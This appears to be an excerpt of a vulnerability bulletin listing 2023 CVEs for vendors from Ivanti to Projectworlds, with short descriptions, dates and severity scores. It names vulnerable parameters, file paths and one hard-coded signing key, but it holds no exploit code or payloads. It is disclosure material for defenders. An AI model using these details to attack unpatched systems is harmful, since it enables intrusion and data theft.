ivanti — avalancheAn unauthenticated could abuse a XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF).2023-12-199.8CVE-2023-46265
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS).2023-12-197.5CVE-2023-46803
[email protected]
ivanti — avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS).2023-12-197.5CVE-2023-46804
[email protected]
ivanti — connect_secureA vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance.2023-12-167.5CVE-2023-39340
[email protected]
jetbrains — teamcityIn JetBrains TeamCity before 2023.11.1 a CSRF on login was possible2023-12-158.8CVE-2023-50870
[email protected]
kaifa — webitr_attendance_systemKaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator’s account, to execute login account’s permissions, and obtain relevant information.2023-12-159.8CVE-2023-48392
[email protected]
kaifa_technology — webitr_attendance_systemKaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.2023-12-158.8CVE-2023-48394
[email protected]
kakadu_software_pty_ltd — kakadu_sdkJPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted the image that is displayed back to the attacker.2023-12-207.5CVE-2023-6562
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49677
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49678
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49679
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49680
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49681
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDate’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49682
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49683
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49684
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTime’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49685
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49686
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtPass’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49687
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtUser’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49688
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘JobId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49689
[email protected]
[email protected]
kashipara_group — job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘WalkinId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49690
[email protected]
[email protected]
kashipara_group — student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘id’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5007
[email protected]
[email protected]
kashipara_group — student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursecode’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5010
[email protected]
[email protected]
kashipara_group — student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursename’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5011
[email protected]
[email protected]
kodcloud — kodboxA vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.2023-12-169.8CVE-2023-6848
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kodcloud — kodboxA vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.2023-12-169.8CVE-2023-6849
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kodcloud — kodexplorerA vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.2023-12-169.8CVE-2023-6850
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kodcloud — kodexplorerA vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.2023-12-169.8CVE-2023-6851
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kodcloud — kodexplorerA vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.2023-12-169.8CVE-2023-6852
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kodcloud — kodexplorerA vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.2023-12-169.8CVE-2023-6853
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kylinsoft — hedron-domain-hookA vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-217.8CVE-2023-7025
[email protected]
[email protected]
[email protected]
lfprojects — mlflowPath Traversal: ‘\..\filename’ in GitHub repository mlflow/mlflow prior to 2.9.2.2023-12-158.1CVE-2023-6831
[email protected]
[email protected]
linux — kernelA race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.2023-12-217.8CVE-2023-6546
[email protected]
[email protected]
[email protected]
linux — kernelA heap out-of-bounds write vulnerability in the Linux kernel’s Performance Events system component can be exploited to achieve local privilege escalation. A perf_event’s read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.2023-12-197.8CVE-2023-6931
[email protected]
[email protected]
linux — kernelA use-after-free vulnerability in the Linux kernel’s ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.2023-12-197.8CVE-2023-6932
[email protected]
[email protected]
linux — linux_kernelA use-after-free vulnerability in the Linux kernel’s netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.2023-12-187.8CVE-2023-6817
[email protected]
[email protected]
[email protected]
[email protected]
m-files_corporation — m-files_serverLack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.2023-12-207.5CVE-2023-6912
[email protected]
majordomo — majordomoMajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.2023-12-159.8CVE-2023-50917
[email protected]
[email protected]
[email protected]
[email protected]
master_slider — master_slider_proDeserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.T his issue affects Master Slider Pro: from n/a through 3.6.5.2023-12-207.1CVE-2023-47507
[email protected]
mindsdb — mindsdbMindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server.2023-12-229.1CVE-2023-50731
[email protected]
[email protected]
[email protected]
[email protected]
misp — mispapp/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.2023-12-159.8CVE-2023-50918
[email protected]
[email protected]
mlflow — mlflowPath Traversal: ‘\..\filename’ in GitHub repository mlflow/mlflow prior to 2.9.2.2023-12-187.5CVE-2023-6909
[email protected]
[email protected]
moxa — iologik_e1200_seriesA Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.2023-12-238.8CVE-2023-5961
[email protected]
mozilla — firefoxTypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121.2023-12-198.8CVE-2023-6866
[email protected]
[email protected]
mozilla — firefoxMemory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121.2023-12-198.8CVE-2023-6873
[email protected]
[email protected]
[email protected]
mozilla — firefox_esr/thunderbirdA use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6.2023-12-198.8CVE-2023-6862
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsThe WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6856
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsFirefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6858
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsA use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6859
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsThe `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6861
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsThe `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6863
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsMemory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6864
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mr-corner — amazing_little_pollAuthentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the “lp_admin.php?adminstep=” parameter.2023-12-209.8CVE-2023-6768
[email protected]
multisuns — easylog_web\+_firmwareMultisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.2023-12-159.8CVE-2023-48388
[email protected]
multisuns — easylog_web\+_firmwareMultisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service.2023-12-159.8CVE-2023-48390
[email protected]
multisuns — easylog_web\+_firmwareMultisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48389
[email protected]
navidrome — navidromeNavidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome’s subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key “not so secret”. The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don’t protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2.2023-12-218.6CVE-2023-51442
[email protected]
[email protected]
netentsec — application_security_gatewayA vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability.2023-12-179.8CVE-2023-6903
[email protected]
[email protected]
[email protected]
netgear — wnr2000_firmwareA Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.2023-12-159.8CVE-2023-50089
[email protected]
[email protected]
nxfilter — nxfilterA vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-189.8CVE-2023-6905
[email protected]
[email protected]
nxfilter — nxfilterA vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-178.8CVE-2023-6904
[email protected]
[email protected]
octokit — appoctokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3.2023-12-157.5CVE-2023-50728
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
openbsd — opensshIn ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.2023-12-189.8CVE-2023-51385
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
openimageio — openimageioA vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service.2023-12-187.5CVE-2023-3430
[email protected]
[email protected]
panasonic — control_fpwin_proStack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file.2023-12-197.8CVE-2023-6314
[email protected]
panasonic — control_fpwin_proOut-of-bouds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file.2023-12-197.8CVE-2023-6315
[email protected]
peazip — peazipA vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release.2023-12-177.8CVE-2023-6891
[email protected]
[email protected]
[email protected]
perl — perlA vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.2023-12-187CVE-2023-47038
[email protected]
[email protected]
[email protected]
phz76 — rtspserverA vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-179.8CVE-2023-6888
[email protected]
[email protected]
[email protected]
[email protected]
projectworlds — online_voting_system_projectOnline Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-48433
[email protected]
[email protected]
projectworlds — online_voting_system_projectOnline Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-48434
[email protected]
[email protected]
projectworlds_pvt._limited — leave_management_system_projectLeave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setearnleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-218.8CVE-2023-44481
[email protected]
[email protected]
projectworlds_pvt._limited — leave_management_system_projectLeave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setsickleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-218.8CVE-2023-44482
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘ch’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45115
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘demail’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45116
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘eid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45117
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘fdid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45118
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘n’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45119
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘qid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45120
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘desc’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45121
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘name’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45122
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘right’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45123
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘tag’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45124
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘time’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45125
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘total’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45126
[email protected]
[email protected]
projectworlds_pvt._limited — online_examination_systemOnline Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘wrong’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-45127
[email protected]
[email protected]
projectworlds_pvt._limited — online_matrimonial_projectOnline Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic3’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-46791
[email protected]
[email protected]
projectworlds_pvt._limited — railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘psd’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48685
[email protected]
[email protected]
projectworlds_pvt._limited — railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘user’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48686
[email protected]
[email protected]
projectworlds_pvt._limited — railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘from’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48687
[email protected]
[email protected]
projectworlds_pvt._limited — railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘to’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48688
[email protected]
[email protected]
projectworlds_pvt._limited — railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘byname’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48689
[email protected]
[email protected]
projectworlds_pvt._limited — railway_reservation_systemRailway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘bynum’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48690
[email protected]
[email protected]
projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_id’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48716
[email protected]
[email protected]
projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48717
[email protected]
[email protected]
projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48718
[email protected]
[email protected]
projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘roll_no’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48719
[email protected]
[email protected]
projectworlds_pvt._limited — student_result_management_systemStudent Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘password’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-48720
[email protected]
[email protected]
